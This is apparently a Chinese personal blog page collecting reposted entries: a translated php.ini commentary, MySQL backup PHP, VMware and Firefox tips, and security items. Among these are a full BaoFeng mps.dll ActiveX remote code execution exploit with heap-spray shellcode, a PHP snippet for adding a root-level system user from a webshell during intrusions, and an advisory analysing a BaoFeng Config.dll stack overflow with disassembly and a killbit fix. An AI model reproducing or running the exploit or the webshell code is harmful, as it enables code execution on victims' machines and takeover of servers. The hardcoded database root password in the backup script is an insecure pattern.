对于php.ini里的内容，很多新手很迷惑所以本人找了个中文翻译也就是中文版的

相信这样大家对于php.ini能够更加了解，也能更熟悉的知道php.ini的关键

[PHP]
; PHP还是一个不断发展的工具，其功能还在不断地删减
; 而php.ini的设置更改可以反映出相当的变化，
; 在使用新的PHP版本前，研究一下php.ini会有好处的

;;;;;;;;;;;;;;;;;;;
; 关于这个文件 ;
;;;;;;;;;;;;;;;;;;;

; 这个文件控制了PHP许多方面的观点。为了让PHP读取这个文件，它必须被命名为
; 'php.ini'。PHP 将在这些地方依次查找该文件：当前工作目录；环境变量PHPRC
; 指明的路径；编译时指定的路径。
; 在windows下，编译时的路径是Windows安装目录。
; 在命令行模式下，php.ini的查找路径可以用 -c 参数替代。

; 该文件的语法非常简单。空白字符和用分号';'开始的行被简单地忽略（就象你可能
; 猜到的一样）。 章节标题（例如 : [Foo]）也被简单地忽略，即使将来它们可能
; 有某种的意义。
;
; 指示被指定使用如下语法：
; 指示标识符 = 值
; directive = value
; 指示标识符 是 *大小写敏感的* - foo=bar 不同于 FOO = bar。
;
; 值可以是一个字符串，一个数字，一个 PHP 常量 (如： E_ALL or M_PI), INI 常量中的
; 一个 (On, Off, True, False, Yes, No and None) ，或是一个表达式
; (如: E_ALL & ~E_NOTICE), 或是用引号括起来的字符串("foo").
;
; INI 文件的表达式被限制于位运算符和括号。
; | bitwise OR
; & bitwise AND
; ~ bitwise NOT
; ! boolean NOT
;
; 布尔标志可用 1, On, True or Yes 这些值置于开的状态。
; 它们可用 0, Off, False or No 这些值置于关的状态。
;
; 一个空字符串可以用在等号后不写任何东西表示，或者用 None 关键字:
;
; foo = ; 将foo置为空字符串
; foo = none ; 将foo置为空字符串
; foo = "none" ; 将foo置为字符串'none'
;
; 如果你值设置中使用常量，而这些常量属于动态调入的扩展库（不是 PHP 的扩展，就是
; Zend 的扩展），你仅可以调入这些扩展的行*之后*使用这些常量。
;
; 所有在 php.ini-dist 文件里设定的值与内建的默认值相同（这是说，如果 php.ini
; 没被使用或者你删掉了这些行，默认值与之相同）。
;;;;;;;;;;;;;;;;;;;;
; 语言选项 ;
;;;;;;;;;;;;;;;;;;;;

engine = On
; 使 PHP scripting language engine（PHP 脚本语言引擎）在 Apache下有效。
short_open_tag = On
; 允许 tags 将被识别。
asp_tags = Off
; 允许ASP-style tags
precision = 14
; 浮点类型数显示时的有效位数

y2k_compliance = Off
; 是否打开 2000年适应 (可能在非Y2K适应的浏览器中导致问题)

output_buffering = Off
; 输出缓存允许你甚至在输出正文内容之后发送 header（标头，包括cookies）行
; 其代价是输出层减慢一点点速度。你可以使用输出缓存在运行时打开输出缓存，
; 或者在这里将指示设为 On 而使得所有文件的输出缓存打开。
output_handler = ; 你可以重定向你的脚本的所有输出到一个函数，
; 那样做可能对处理或以日志记录它有用。
; 例如若你将这个output_handler 设为"ob_gzhandler",
; 则输出会被透明地为支持gzip或deflate编码的浏览器压缩。
; 设一个输出处理器自动地打开输出缓冲。

implicit_flush = Off
; 强制flush（刷新）让PHP 告诉输出层在每个输出块之后自动刷新自身数据。
; 这等效于在每个 print() 或 echo() 调用和每个 HTML 块后调用flush()函数。
; 打开这项设置会导致严重的运行时冲突，建议仅在debug过程中打开。

allow_call_time_pass_reference = On
; 是否让强迫函数调用时按引用传递参数。这一方法遭到抗议，
; 并可能在将来版本的PHP/Zend里不再支持。
; 受到鼓励的指定哪些参数按引用传递的方法是在函数声明里。
; 你被鼓励尝试关闭这一选项并确认你的脚本仍能正常工作，以保证在将来版本的语言里
; 它们仍能工作。（你将在每次使用该特点时得到一个警告，而参数将按值而不是按引用
; 传递）。 Read the rest of this entry

以下是在Linux下通过Apache+PHP对Mysql数据库的备份的文件代码：

文件一、Listtable.php （文件列出数据库中的所有表格，供选择备份）

请选择要备份的表格:

< ?
$con=mysql_connect('localhost','root','xswlily');
$lists=mysql_list_tables("embed",$con);
//数据库连接代码
$i=0;
while($i$tb_name=mysql_tablename($lists,$i);
echo "".$tb_name."
";
//列出所有的表格
$i++;}
 
?>

Read the rest of this entry

PHP程序增加系统用户
很多人在参透的时候
对于webshell的 php shell里Eval PHP Code »
很多不知道干什么用的
其实用php也可以增加一个系统用户
怎么实现php增加系统用户呢
下面是一段例程，增加一个名字为123的用户,ro
ot密码是 1234。仅供参考

$sucommand = "su --login root --command";
$useradd = "useradd ";
$rootpasswd = "1234";
$user = "123";
$user_add = sprintf("%s "%s %s"",$sucommand,$useradd,$user);
$fp = @popen($user_add,"w");
@fputs($fp,$rootpasswd);
@pclose($fp);

晓鹏提示，此法适用于有ROOT权限的LINUX用户。。
转自：http://www.54rk.cn//blogview.asp?id=315

#
# BaoFeng (mps.dll) Remote Code Execution Exploit
# By: MITBOY
# Download: www.baofeng.com
#
# Problem DLL    :     mps.dll
# Problem Func   :   OnBeforeVideoDownload()
 
<html>
<body>
<object classid="clsid:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB" id="target"></object>
<input type="button" onclick="test()" value="test" />
<script>
function test()
{
    var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
    var bigblock = unescape("%u9090%u9090");
    var headersize = 20;
    var slackspace = headersize+shellcode.length;
    while (bigblock.length<slackspace)
        bigblock+=bigblock;
 
    fillblock = bigblock.substring(0, slackspace);
    block = bigblock.substring(0, bigblock.length-slackspace);
    while(block.length+slackspace<0x40000)
        block = block+block+fillblock;
 
    memory = new Array();
    for (x=0; x<300; x++)
        memory[x] = block + shellcode;
    var buffer = '';
    while (buffer.length < 4150)
        buffer+="\x0c\x0c\x0c\x0c";
    target.OnBeforeVideoDownload(buffer);
}
</script>
</body>
</html>

转自：http://www.rootkit.net.cn/default.asp?id=119

由于晓鹏用的是精简版的VMWARE，里面没有LINUX所用的VMWARE TOOLS，所以就去网上找了个下载地址。我的版本是6.5。

下载地址：http://www.xdowns.com/soft/6/99/2008/Soft_45322.html

下载好后，用光驱载入ISO文件。

然后

cd /cdrom/vmware-tools-distrib

sudo ./vmware-install.pl

然后我们要做的就是安装了。不过晓鹏用lixiaopeng这个帐号，无法安装成功，总是跳出permission denied的错误，然后我就用了ROOT登陆安装了。唉。还是这样好搞，说下方法。

首先我们激活ROOT用户，这个用户在UBUNTU中是存在的，只是没法登陆。

打开终端，输入

sudo -s

sudo passwd root

输入你的密码，然后输入

gksu  /usr/sbin/gdmsetup

调出了系统管理中的登陆窗口，然后点安全选项卡，选中允许本地管理员登陆

再然后就是退出，用ROOT帐号重新登陆，输入

cd /cdrom/vmware-tools-distrib

./vmware-install.pl

接着就是一步一步安装了。嘿嘿。安装的时候网卡会停用一下，一会就好，然后选一下显示的信息，不要要求太大，我选的是1024*768

再然后就重启一下，OK。

此贴发于VMWARE 下的UBUNTU中。。

嘿嘿，以前晓鹏都在用一个X浏览器的软件，可以直接把Firefox的所有配置保存在软件根目录，不过当firefox升级的时候就麻烦了，所以去网上搜了一下，发现只需要加-p就可以进行设置了。。

在你的快捷方式右击属性，在目标那里"D:\Program Files\Mozilla Firefox\firefox.exe"改为"D:\Program Files\Mozilla Firefox\firefox.exe" -p

然后确定，重新打开这个快捷方式就行了，删除默认的方案。新建方案，选择要存放Firefox配置的目录，确定。然后把快捷方式的D:\Program Files\Mozilla Firefox\firefox.exe" -p改为D:\Program Files\Mozilla Firefox\firefox.exe"就好了。。

简单吧，以后重做系统，只是不删配置文件，重新用-P把目录指向那个目录就行了。。。

晓鹏偶在Google Reader下面订阅了很多的文章，但读起来每次都要登陆上去，而且看起来还很麻烦，上次介绍了Snarfer RSS Reader 这个软件，用起来还行，不过偶恢复系统后，再打开的时候发现要重新设置，不能保存以前看过的文章，一更新的话只有最近更新的一些文章了。。。

正好偶的FIREFOX是装在D盘，和系统无关的，所以就装了这个插件feedly,虽然小巧，不过功能很强大。效果也变不错的，直接在FIREFOX下就能用了。。

下载地址：http://www.feedly.com/

晓鹏是在vmware官方找到的这个解决方案，有时大家实在有问题无法解决时，不如去官方看一下，有时会有意想不到的效果哦

当我们用VMWARE自定义选项来新建虚拟机选了SCSI的硬盘的时候，你装Windows XP会提示找不到硬盘，那么大家就应该去装一下这个驱动了

首先下载http://download3.vmware.com/software/vmscsi-1.2.0.4.flp

然后我们在虚拟中添加软驱，默认情况下是添加好的，载入我们下载的软驱文件。然后设好以XP光盘启动，进入安装界面后提示按F6载入SCSI驱动。

过一会会出现提示需要安装驱动的界面，按S选择VMWARE的那个驱动（晓鹏试了，如果直接按ENTER回车是不能安装的），选好后，按ENTER回车，然后再按ENTER回车，等一下就可以进入正常的安装了。。。

暴风影音2009(Config.dll)ActiveX远程栈溢出漏洞
by bugvuln(bugvuln_at_gmail.com)
niklen(niklenxyz_at_gmail.com)描述:
暴风影音是国内一款相当流行的万能播放器

http://www.baofeng.com/

受影响的系统:
暴风影音2009 <=[3.09.04.17]

细节:
clsid:BD103B2B-30FB-4F1E-8C17-D8F6AADBCC05
C:\Program Files\StormII\Config.dll
Sub SetAttributeValue (
ByVal lpQueryStr As String ,
ByVal bstrAttributeName As String ,
ByVal lpValueStr As String
)

当参数lpQueryStr是一个超长字符串时，发生栈溢出，利用堆填充技术，攻击者可以很轻松的利用此漏洞执行任意代码

分析:

.text:10009A4C				 push	ebp
.text:10009A4D				 mov	 ebp, esp
.text:10009A4F				 sub	 esp, 208h	   ; 开辟208h的堆栈空间
.text:10009A55				 cmp	 [ebp+Source], 0 ; 判断参数1是否为空
.text:10009A59				 jz	  short loc_10009AA8
.text:10009A5B				 cmp	 [ebp+arg_C], 0  ; 判断参数3是否为空
.text:10009A5F				 jz	  short loc_10009AA8
.text:10009A61				 push	[ebp+Source]	; 参数1
.text:10009A64				 lea	 eax, [ebp+String]
.text:10009A6A				 push	eax			 ; eax正好指向ebp-208h的堆栈区域
.text:10009A6B				 call	ds:wcscpy	   ; oh，my god，不进行参数合法性检查，直接开始拷贝操作，
.text:10009A6B										 ; 哦豁了，eax指向的堆栈区域全部被超长非法参数占领了-_-！
.text:10009A71				 pop	 ecx
.text:10009A72				 lea	 eax, [ebp+String]
.text:10009A78				 pop	 ecx
.text:10009A79				 push	[ebp+arg_8]
.text:10009A7C				 push	offset String   ; "/@"
.text:10009A81				 push	offset aSS	  ; "%s%s"
.text:10009A86				 push	eax			 ; String
.text:10009A87				 call	ds:swprintf	 ; 上面的拷贝直接影响到这里的swprintf,相当于再对eax指向的堆栈进行一次拷贝操作
			 ; 没有上边的拷贝，这里也要出问题
.text:10009A8D				 add	 esp, 10h
.text:10009A90				 lea	 eax, [ebp+String]
.text:10009A96				 push	[ebp+arg_C]
.text:10009A99				 push	eax
.text:10009A9A				 call	sub_10001201
.text:10009A9F				 mov	 ecx, eax
.text:10009AA1				 call	sub_1000CC9A
.text:10009AA6				 jmp	 short locret_10009AAD
.text:10009AA8 ; ---------------------------------------------------------------------------
.text:10009AA8
.text:10009AA8 loc_10009AA8:						   ; CODE XREF: sub_10009A4C+Dj
.text:10009AA8										 ; sub_10009A4C+13j
.text:10009AA8				 mov	 eax, 80004005h
.text:10009AAD
.text:10009AAD locret_10009AAD:						; CODE XREF: sub_10009A4C+5Aj
.text:10009AAD				 leave
.text:10009AAE				 retn	10h		; 就这样返回，哦豁了

ModLoad: 41f50000 41fc7000 C:\WINDOWS\system32\mshtmled.dll
ModLoad: 10000000 10020000 C:\Program Files\StormII\Config.dll
ModLoad: 63380000 633f8000 C:\WINDOWS\system32\jscript.dll
(eec.ee8): Illegal instruction - code c000001d (first chance)
(eec.ee8): Illegal instruction - code c000001d (!!! second chance !!!)
eax=80004005 ebx=100116b0 ecx=0175f998 edx=00030001 esi=0039fe98 edi=00000000
eip=00410061 esp=0175f5ec ebp=00410041 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\Internet Explorer\IEXPLORE.EXE
IEXPLORE+0×10061:
00410061 ff ???
解决办法:
在厂商没有推出相应的补丁之前，
建议用户通过注册表对相应的CLSID:BD103B2B-30FB-4F1E-8C17-D8F6AADBCC05设置Killbit
或者将以下文本保存为.REG文件并导入:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{BD103B2B-30FB-4F1E-8C17-D8F6AADBCC05}]
“Compatibility Flags”=dword:00000400

–EOF–